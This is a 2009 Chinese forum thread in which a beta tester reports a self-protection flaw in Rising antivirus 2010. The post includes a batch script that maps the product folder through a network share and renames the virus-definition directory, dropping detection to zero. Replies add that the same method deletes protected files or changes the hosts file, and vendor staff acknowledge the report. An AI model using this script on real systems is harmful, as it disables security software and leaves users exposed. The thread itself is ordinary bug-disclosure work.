1   1  /  1  页   跳转

瑞星2010版本第二阶段测试(二)

瑞星2010版本第二阶段测试(二)

瑞星2010版本第二阶段测试(二)

 

瑞星自我保护的失误 --- 重大BUG

 






瑞星的自我保护真的无懈可击吗?现在我们不谈什么所谓的驱动级、底层对抗,接着往下看:


net share ris="c:\program files\rising\ris"
net use z: \\%computername%\ris
z:
ren def def1
net share ris /delete
net use x: /delete /y


这里算客气的了,仅仅是更改了瑞星病毒库目录名,说到这里,我不得不提出批评,我在第一阶段测试中就明确提到瑞星启动时必须做病毒库的校验,可是,很遗憾,依旧没有。瑞星监控的小伞依旧是绿色,可是此时的查杀率为0.

成功突破瑞星防御轻松修改(DEF文件夹被更名)

看到了吧,此时瑞星的防御仍有效



上面的测试中,完全可以用RD <DIR> /S /Q命令完成对瑞星全部文件的删除(除了使用中的文件),也可以十分容易的完成完成我写的第二阶段测试(一)里面的内容。瑞星被破坏但丝毫没任何报警。



用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
最后编辑hymwxm 最后编辑于 2009-07-24 12:04:31
分享到:
gototop
 

回复:瑞星2010版本第二阶段测试(二)

非常感谢您的支持,您的问题已反馈相关部门分析。
gototop
 

回复: 瑞星2010版本第二阶段测试(二)

此BUG建议瑞星立即修正,通过上述方法可以轻易完成对很多瑞星保护项目的破坏!

例如对hosts文件修改时,瑞星防御会予以报警



那么采用上述方法,可以很轻易的越过防御完成修改

gototop
 

回复:瑞星2010版本第二阶段测试(二)

LZ这段代码怎么用?
net share ris="c:\program files\rising\ris"
net use z: \\%computername%\ris
z:
ren def def1
net share ris /delete
net use x: /delete /y
gototop
 

回复:瑞星2010版本第二阶段测试(二)

保存为BAT文件,自己测试吧。
gototop
 

回复:瑞星2010版本第二阶段测试(二)

这个问题应该请瑞星的研发工程师来看看,尽快修复。
gototop
 

回复: 瑞星2010版本第二阶段测试(二)



引用:
原帖由 瑞星工程师14 于 2009-7-21 12:13:00 发表
非常感谢您的支持,您的问题已反馈相关部门分析。


瑞星已经收集了。

可以说这个是个重大的BUG,通过上述手段可以轻松的删除任何瑞星保护的文件。

瑞星22.00.00.46版本仍没有修复此BUG。

继续等待...
gototop
 

回复:瑞星2010版本第二阶段测试(二)

非常感谢楼主的反馈,我们会尽快修改的
欢迎加入
瑞星杀毒软件QQ群 47032532
瑞星个人防火墙QQ群 204732153
瑞星路由安全卫士QQ群 213941034
瑞星安全WiFi QQ群 81864985
瑞星手机安全助手QQ群 64866930
gototop
 

回复: 瑞星2010版本第二阶段测试(二)

很遗憾,瑞星22.00.00.65仍没有修复这个BUG,估计要等到正式版了。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT